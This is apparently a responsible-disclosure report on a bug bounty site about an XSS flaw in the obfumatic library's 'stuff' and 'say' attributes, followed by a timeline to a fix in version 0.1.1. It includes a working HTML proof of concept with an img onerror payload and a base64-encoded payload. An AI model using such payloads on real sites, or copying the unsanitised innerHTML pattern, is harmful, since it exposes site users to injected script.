Potential XSS injection in stuff and say attributes in i40west/obfumatic

Valid

Reported on

Jul 15th 2023

Description

The stuff and say attributes are not sanitized before being used in innerHTML. Because of this, they could be used to inject arbitrary JS in the page.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <title>obfumatic XSS</title>
    <script type="module" src="obfumatic.js"></script>
</head>
<body>
    <obfu-matic stuff="SWo0OGFXMW5JSE55WXoxNElHOXVaWEp5YjNJOUoyRnNaWEowS0dCNGMzTWdhVzRnYzNSMVptWmdLU2Mr" say="<img src=x onerror='alert(`xss in say`)'>">Fallback text</obfu-matic>
</body>
</html>

Impact

If a website using this library allows users to generate <obfu-matic> tags (for example in comments), an attacker could use this to inject dangerous JS into the page.

We are processing your report and will contact the i40west/obfumatic team within 24 hours. 2 months ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago

We have contacted a member of the i40west/obfumatic team and are waiting to hear back 2 months ago

A i40west/obfumatic maintainer has acknowledged this report 2 months ago

i40west validated this vulnerability 2 months ago

Pierre Rudloff has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

i40west marked this as fixed in 0.1.1 with commit bab057 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

i40west published this vulnerability 2 months ago

to join this conversation